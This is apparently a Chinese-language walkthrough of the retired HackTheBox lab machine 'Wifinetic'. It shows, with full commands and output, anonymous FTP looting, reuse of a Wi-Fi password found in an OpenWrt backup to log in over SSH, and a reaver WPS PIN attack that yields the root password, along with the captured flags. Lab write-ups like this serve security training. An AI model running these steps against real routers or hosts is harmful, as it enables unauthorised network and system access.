信息收集
端口扫描
nmap -sC -sV -A -p- --min-rate=10000 10.129.229.90
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-27 01:45 EST
Warning: 10.129.229.90 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.129.229.90
Host is up (0.43s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.10.14.18
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 ftp ftp 4434 Jul 31 11:03 MigrateOpenWrt.txt
| -rw-r--r-- 1 ftp ftp 2501210 Jul 31 11:03 ProjectGreatMigration.pdf
| -rw-r--r-- 1 ftp ftp 60857 Jul 31 11:03 ProjectOpenWRT.pdf
| -rw-r--r-- 1 ftp ftp 40960 Sep 11 15:25 backup-OpenWrt-2023-07-26.tar
|_-rw-r--r-- 1 ftp ftp 52946 Jul 31 11:03 employees_wellness.pdf
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
53/tcp open tcpwrapped
Aggressive OS guesses: Linux 5.4 (96%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), Linux 5.0 (93%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 4.15 - 5.8 (93%), Adtran 424RG FTTH gateway (93%), Linux 3.10 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 1720/tcp)
HOP RTT ADDRESS
1 424.71 ms 10.10.14.1
2 432.78 ms 10.129.229.90
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 61.43 seconds
通过扫描结果可以看到ftp端口存在几个文件,看看有什么信息
ftp登录发现需要输入用户名
ftp 10.129.229.90
Connected to 10.129.229.90.
220 (vsFTPd 3.0.3)
Name (10.129.229.90:kali):
看到nmap扫描结果里面有个Anonymous,输入试试
Name (10.129.229.90:kali): Anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> la
?Invalid command.
ftp> ls
229 Entering Extended Passive Mode (|||40353|)
150 Here comes the directory listing.
-rw-r--r-- 1 ftp ftp 4434 Jul 31 11:03 MigrateOpenWrt.txt
-rw-r--r-- 1 ftp ftp 2501210 Jul 31 11:03 ProjectGreatMigration.pdf
-rw-r--r-- 1 ftp ftp 60857 Jul 31 11:03 ProjectOpenWRT.pdf
-rw-r--r-- 1 ftp ftp 40960 Sep 11 15:25 backup-OpenWrt-2023-07-26.tar
-rw-r--r-- 1 ftp ftp 52946 Jul 31 11:03 employees_wellness.pdf
226 Directory send OK.
get下载下来看看
ftp> get MigrateOpenWrt.txt
local: MigrateOpenWrt.txt remote: MigrateOpenWrt.txt
229 Entering Extended Passive Mode (|||45924|)
150 Opening BINARY mode data connection for MigrateOpenWrt.txt (4434 bytes).
100% |**************************************************************************************************************| 4434 7.89 KiB/s 00:00 ETA
226 Transfer complete.
4434 bytes received in 00:00 (4.44 KiB/s)
ftp> get ProjectGreatMigration.pdf
local: ProjectGreatMigration.pdf remote: ProjectGreatMigration.pdf
229 Entering Extended Passive Mode (|||46499|)
150 Opening BINARY mode data connection for ProjectGreatMigration.pdf (2501210 bytes).
100% |**************************************************************************************************************| 2442 KiB 4.04 KiB/s 00:00 ETA
226 Transfer complete.
2501210 bytes received in 10:04 (4.03 KiB/s)
ftp> get ProjectOpenWRT.pdf
local: ProjectOpenWRT.pdf remote: ProjectOpenWRT.pdf
229 Entering Extended Passive Mode (|||47888|)
150 Opening BINARY mode data connection for ProjectOpenWRT.pdf (60857 bytes).
100% |**************************************************************************************************************| 60857 26.33 KiB/s 00:00 ETA
226 Transfer complete.
60857 bytes received in 00:02 (22.13 KiB/s)
ftp> get backup-OpenWrt-2023-07-26.tar
local: backup-OpenWrt-2023-07-26.tar remote: backup-OpenWrt-2023-07-26.tar
229 Entering Extended Passive Mode (|||49270|)
150 Opening BINARY mode data connection for backup-OpenWrt-2023-07-26.tar (40960 bytes).
100% |**************************************************************************************************************| 40960 3.24 KiB/s 00:00 ETA
226 Transfer complete.
40960 bytes received in 00:12 (3.13 KiB/s)
ftp> get employees_wellness.pdf
local: employees_wellness.pdf remote: employees_wellness.pdf
229 Entering Extended Passive Mode (|||43272|)
150 Opening BINARY mode data connection for employees_wellness.pdf (52946 bytes).
100% |**************************************************************************************************************| 52946 3.56 KiB/s 00:00 ETA
226 Transfer complete.
52946 bytes received in 00:14 (3.46 KiB/s)
文件浏览
按个查看文件看看有什么信息
在employees_wellness.pdf里面看到[email protected]和[email protected],简单看下一份人力资源经理发送的邮件,推出了员工健康计划
在ProjectGreatMigration.pdf里面看到主域wifinetic.htb
将10.129.229.90和wifinetic.htb加入hosts
ProjectOpenWRT.pdf和employees_wellness.pdf差不多,存在两个邮箱[email protected]和[email protected]
压缩包里存在很多文件,看看有价值的信息
passwd信息
root:x:0:0:root:/root:/bin/ash
daemon:*:1:1:daemon:/var:/bin/false
ftp:*:55:55:ftp:/home/ftp:/bin/false
network:*:101:101:network:/var:/bin/false
nobody:*:65534:65534:nobody:/var:/bin/false
ntp:x:123:123:ntp:/var/run/ntp:/bin/false
dnsmasq:x:453:453:dnsmasq:/var/run/dnsmasq:/bin/false
logd:x:514:514:logd:/var/run/logd:/bin/false
ubus:x:81:81:ubus:/var/run/ubus:/bin/false
netadmin:x:999:999::/home/netadmin:/bin/false
/etc/config/无线
config wifi-device 'radio0'
option type 'mac80211'
option path 'virtual/mac80211_hwsim/hwsim0'
option cell_density '0'
option channel 'auto'
option band '2g'
option txpower '20'
config wifi-device 'radio1'
option type 'mac80211'
option path 'virtual/mac80211_hwsim/hwsim1'
option channel '36'
option band '5g'
option htmode 'HE80'
option cell_density '0'
config wifi-iface 'wifinet0'
option device 'radio0'
option mode 'ap'
option ssid 'OpenWrt'
option encryption 'psk'
option key 'VeRyUniUqWiFIPasswrd1!'
option wps_pushbutton '1'
config wifi-iface 'wifinet1'
option device 'radio1'
option mode 'sta'
option network 'wwan'
option ssid 'OpenWrt'
option encryption 'psk'
option key 'VeRyUniUqWiFIPasswrd1!'
这里拿到一个密码VeRyUniUqWiFIPasswrd1!,但不确定用于哪里,其他文件都存在部分信息,但对于获取shell价值不大,尝试用这个密码登录ssh看看
sshpass -p 'VeRyUniUqWiFIPasswrd1!' ssh [email protected]
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-162-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Wed 27 Dec 2023 08:55:16 AM UTC
System load: 0.04
Usage of /: 65.0% of 4.76GB
Memory usage: 6%
Swap usage: 0%
Processes: 228
Users logged in: 0
IPv4 address for eth0: 10.129.229.90
IPv6 address for eth0: dead:beef::250:56ff:feb9:8b0
IPv4 address for wlan0: 192.168.1.1
IPv4 address for wlan1: 192.168.1.23
* Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
just raised the bar for easy, resilient and secure K8s cluster deployment.
https://ubuntu.com/engage/secure-kubernetes-at-the-edge
Expanded Security Maintenance for Applications is not enabled.
0 updates can be applied immediately.
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Tue Sep 12 12:46:00 2023 from 10.10.14.23
netadmin@wifinetic:~$ whoami&&id
netadmin
uid=1000(netadmin) gid=1000(netadmin) groups=1000(netadmin)
再目录存在user.txt,获得user的flag
netadmin@wifinetic:~$ ls
user.txt
netadmin@wifinetic:~$ cat user.txt
c419f02a02652e537bad0fd6b6f19e11
提权
前面阅读文件可以看到于wif存在一定关系,查看下IP
netadmin@wifinetic:~$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.129.229.90 netmask 255.255.0.0 broadcast 10.129.255.255
inet6 fe80::250:56ff:feb9:8b0 prefixlen 64 scopeid 0x20<link>
inet6 dead:beef::250:56ff:feb9:8b0 prefixlen 64 scopeid 0x0<global>
ether 00:50:56:b9:08:b0 txqueuelen 1000 (Ethernet)
RX packets 1481248 bytes 89122298 (89.1 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 118893 bytes 10041697 (10.0 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 3497 bytes 211212 (211.2 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 3497 bytes 211212 (211.2 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
mon0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
unspec 02-00-00-00-02-00-30-3A-00-00-00-00-00-00-00-00 txqueuelen 1000 (UNSPEC)
RX packets 101982 bytes 17956188 (17.9 MB)
RX errors 0 dropped 101982 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.1.1 netmask 255.255.255.0 broadcast 192.168.1.255
inet6 fe80::ff:fe00:0 prefixlen 64 scopeid 0x20<link>
ether 02:00:00:00:00:00 txqueuelen 1000 (Ethernet)
RX packets 3394 bytes 319824 (319.8 KB)
RX errors 0 dropped 467 overruns 0 frame 0
TX packets 3929 bytes 455515 (455.5 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
wlan1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.1.23 netmask 255.255.255.0 broadcast 192.168.1.255
inet6 fe80::ff:fe00:100 prefixlen 64 scopeid 0x20<link>
ether 02:00:00:00:01:00 txqueuelen 1000 (Ethernet)
RX packets 993 bytes 138009 (138.0 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 3394 bytes 380916 (380.9 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
wlan2: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500
ether 02:00:00:00:02:00 txqueuelen 1000 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
可以看到存在wlan,使用iw dev查看wifi更多信息
netadmin@wifinetic:~$ iw dev
phy#2
Interface mon0
ifindex 7
wdev 0x200000002
addr 02:00:00:00:02:00
type monitor
txpower 20.00 dBm
Interface wlan2
ifindex 5
wdev 0x200000001
addr 02:00:00:00:02:00
type managed
txpower 20.00 dBm
phy#1
Unnamed/non-netdev interface
wdev 0x1000000f2
addr 42:00:00:00:01:00
type P2P-device
txpower 20.00 dBm
Interface wlan1
ifindex 4
wdev 0x100000001
addr 02:00:00:00:01:00
type managed
txpower 20.00 dBm
phy#0
Interface wlan0
ifindex 3
wdev 0x1
addr 02:00:00:00:00:00
ssid OpenWrt
type AP
channel 1 (2412 MHz), width: 20 MHz (no HT), center1: 2412 MHz
txpower 20.00 dBm
查看是否存在reaver信息,getcap -r / 2>/dev/null
netadmin@wifinetic:~$ getcap -r / 2>/dev/null
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
/usr/bin/ping = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/reaver = cap_net_raw+ep
找到了reaaver信息,对wifi进行暴力破解,reaver -i mon0 -b 02:00:00:00:00:00 -vv -c 1
netadmin@wifinetic:~$ reaver -i mon0 -b 02:00:00:00:00:00 -vv -c 1
Reaver v1.6.5 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
[+] Switching mon0 to channel 1
[+] Waiting for beacon from 02:00:00:00:00:00
[+] Received beacon from 02:00:00:00:00:00
[+] Trying pin "12345670"
[+] Sending authentication request
[!] Found packet with bad FCS, skipping...
[+] Sending association request
[+] Associated with 02:00:00:00:00:00 (ESSID: OpenWrt)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 1 seconds
[+] WPS PIN: '12345670'
[+] WPA PSK: 'WhatIsRealAnDWhAtIsNot51121!'
[+] AP SSID: 'OpenWrt'
[+] Nothing done, nothing to save.
拿到密码“WhatIsRealAnDWhAtIsNot51121!”,登录root
netadmin@wifinetic:~$ su
Password:
root@wifinetic:/home/netadmin# whoami&&id
root
uid=0(root) gid=0(root) groups=0(root)
获得root权限flag
root@wifinetic:~# ls
root.txt snap
root@wifinetic:~# cat root.txt
672e4f5122b20f0d909c77c94f3b67c4
原文始发于微信公众号(XDsecurity):HACKTHEBOX通关笔记——wifinetic靶机(已退役)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论